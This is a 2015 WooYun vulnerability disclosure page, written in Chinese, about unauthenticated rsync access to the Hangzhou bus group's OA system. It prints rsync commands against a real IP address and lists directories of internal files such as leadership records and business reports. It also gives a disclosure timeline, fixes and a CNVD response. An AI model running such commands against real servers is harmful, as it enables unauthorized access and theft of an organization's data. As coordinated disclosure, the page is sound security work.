当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125959

漏洞标题:杭州公交集团OA系统rsync未授权访问

相关厂商:hzbus.com.cn

漏洞作者: Aerfa21

提交时间:2015-07-10 19:26

修复时间:2015-08-28 15:10

公开时间:2015-08-28 15:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

resync未授权访问导致泄露大量敏感信息,包括leaderinfo、innerdoc、yewuribao、yewuyuebao.....

详细说明:

先上图吧


1.png


rsync -v 61.164.37.78::
attachments


rsync -v 61.164.37.78::attachments
receiving file list ... done
drwx------       12288 2014/04/09 02:39:27 .
drwx------           0 2011/10/02 12:58:19 1226975731046
drwx------           0 2011/10/02 12:58:19 cachet
drwx------      524288 2015/07/09 21:13:39 communication
drwx------       32768 2015/05/07 00:50:23 cwgk
drwx------      131072 2015/05/07 00:47:18 dangjian
drwx------           0 2015/05/29 03:02:20 documentmanage
drwx------     5242880 2015/07/10 04:45:31 getdoc
drwx------       49152 2012/03/07 02:05:54 gjbtg
drwx------     9699328 2015/07/10 03:57:56 innerdoc
drwx------           0 2012/11/01 01:36:15 kanwu
drwx------       24576 2014/12/12 03:09:33 keijiao05
drwx------      131072 2015/03/24 23:14:07 keijiao11
drwx------      786432 2015/07/09 22:46:10 kejiao01
drwx------      163840 2015/07/09 01:56:46 kejiao02
drwx------      131072 2015/07/09 01:58:04 kejiao03
drwx------       98304 2015/05/31 21:45:19 kejiao04
drwx------      163840 2015/07/09 01:59:17 kejiao06
drwx------      131072 2012/08/28 09:57:42 kejiao07
drwx------      327680 2015/05/20 02:25:19 kejiao08
drwx------       98304 2015/07/03 01:51:46 kejiao09
drwx------      163840 2015/07/08 03:18:09 kejiao10
drwx------      196608 2015/06/29 04:59:26 kejiao12
drwx------      262144 2015/07/08 03:28:22 kejiao13
drwx------      655360 2015/07/03 01:54:09 kejiao14
drwx------      131072 2015/06/17 01:30:58 kejiao15
drwx------       32768 2015/04/19 07:32:55 kejiao16
drwx------      262144 2015/06/17 01:29:00 kejiao18
drwx------     2097152 2015/07/09 22:08:16 kejiao19
drwx------       40960 2015/06/20 22:20:22 kejiao20
drwx------       32768 2014/12/01 03:27:21 kejiao21
drwx------       32768 2015/06/29 00:01:04 kejiao22
drwx------       81920 2014/05/20 07:39:14 kejiao23
drwx------       20480 2014/10/04 04:25:09 kejiao24
drwx------        8192 2013/09/23 22:06:22 kejiao25
drwx------       40960 2015/07/08 03:37:31 kejiao26
drwx------       20480 2014/07/28 21:20:21 kejiao27
drwx------       12288 2014/05/31 07:03:42 kejiao28
drwx------      131072 2015/07/09 02:00:39 kejiao29
drwx------       28672 2015/06/30 21:04:04 leaderinfo
drwx------     4980736 2015/07/10 04:45:16 notice
drwx------       32768 2015/07/05 20:42:30 reporttemp
drwx------    23592960 2015/07/10 04:45:29 senddoc
drwx------      4096   2011/10/02 12:44:05 temp
drwx------      196608 2015/05/19 04:34:21 template
drwx------      0      2011/10/02 12:44:04 upload
drwx------      393216 2015/07/10 03:55:02 watchmanage
drwx------      40960  2014/10/29 03:18:53 workreport
drwx------      16384  2011/10/02 12:43:59 wrapUp
drwx------     1835008 2015/05/20 02:28:05 yewuribao
drwx------      262144 2015/07/07 03:40:08 yewuyuebao
drwx------      262144 2015/07/10 04:38:26 ygbjgl
drwx------      8192   2011/10/02 12:43:35 zhidu


rsync -v 61.164.37.78::attachments/leaderinfo/
receiving file list ... done
drwx------       28672 2015/06/30 21:04:04 .
drwx------           0 2011/10/02 12:51:49 1217911523703
drwx------           0 2011/10/02 12:51:49 1217911700718
drwx------           0 2011/10/02 12:51:49 1217912709015
drwx------           0 2011/10/02 12:51:49 1218000035640
drwx------           0 2011/10/02 12:51:49 1218001836828
drwx------           0 2011/10/02 12:51:49 1218007993828
drwx------           0 2011/10/02 12:51:49 1218173459156
drwx------           0 2011/10/02 12:51:49 1226041078015
drwx------           0 2011/10/02 12:51:49 1226628623343
drwx------           0 2011/10/02 12:51:49 1229065976281
drwx------           0 2011/10/02 12:51:49 1229337847734
drwx------           0 2011/10/02 12:51:49 1231030827062
drwx------           0 2011/10/02 12:51:49 1231137069109
drwx------           0 2011/10/02 12:51:49 1232178010593
drwx------           0 2011/10/02 12:51:49 1237875076187
drwx------           0 2011/10/02 12:51:49 1237881715109
drwx------           0 2011/10/02 12:51:49 1242893351125
drwx------           0 2011/10/02 12:51:49 1244795075000
drwx------           0 2011/10/02 12:51:49 1254212037568
drwx------           0 2011/10/02 12:51:49 1257233392547
drwx------           0 2011/10/02 12:51:49 1263009170085
drwx------           0 2011/10/02 12:51:49 1268747205024
drwx------           0 2011/10/02 12:51:49 1269220352827
drwx------           0 2011/10/02 12:51:49 1278508323937
drwx------           0 2011/10/02 12:51:49 1279951844296
drwx------           0 2011/10/02 12:51:49 1281947079034
drwx------           0 2011/10/02 12:51:49 1286851137653
drwx------           0 2011/10/02 12:51:49 1289546065661
drwx------           0 2011/10/02 12:51:49 1298426005046
drwx------           0 2011/10/02 12:51:49 1306335386675
drwx------           0 2011/12/01 21:13:05 1322791985156
drwx------           0 2012/05/11 02:28:33 1336717713044
drwx------           0 2012/06/10 07:55:18 1339329318225
drwx------           0 2012/08/08 13:37:57 1344447477396
drwx------           0 2013/01/12 03:43:42 1357980222547
drwx------           0 2013/01/12 03:45:09 1357980309516
drwx------           0 2013/03/19 04:40:50 1363682450771
drwx------           0 2013/03/19 04:43:16 1363682596771
drwx------           0 2013/05/02 09:16:17 1367500577684
drwx------           0 2013/07/25 01:57:43 1374731863119
drwx------           0 2013/09/12 03:14:07 1378970047051
drwx------           0 2013/11/02 07:32:03 1383391923797
drwx------           0 2013/11/20 22:48:28 1385005708720
drwx------           0 2013/11/26 19:45:02 1385513102100
drwx------           0 2014/01/06 01:24:42 1388989482116
drwx------           0 2014/02/27 20:07:15 1393549635490
drwx------           0 2014/05/08 04:43:56 1399538636101
drwx------           0 2014/05/27 00:31:03 1401165063385
drwx------           0 2014/08/18 03:09:30 1408345770583
drwx------           0 2014/09/28 03:38:31 1411889911278
drwx------           0 2014/10/04 04:24:03 1412411043231
drwx------           0 2014/11/03 20:33:57 1415064837362
drwx------           0 2014/11/25 02:50:07 1416901807953
drwx------           0 2015/01/18 03:05:15 1421568315850
drwx------           0 2015/01/29 02:40:42 1422517242403
drwx------           0 2015/02/12 23:06:31 1423800391149
drwx------           0 2015/04/08 10:47:10 1428504430386
drwx------           0 2015/04/19 07:35:30 1429443330936
drwx------           0 2015/04/27 20:06:52 1430179612301
drwx------           0 2015/05/31 09:23:40 1433078620454
drwx------           0 2015/06/30 21:04:04 1435712644251

漏洞证明:

如上述

修复方案:

<1>限定访问IP:IP Tables防火墙或修改配置文件rsync.conf
<2>不允许匿名访问,添加用户口令

版权声明:转载请注明来源 Aerfa21@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-07-14 15:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论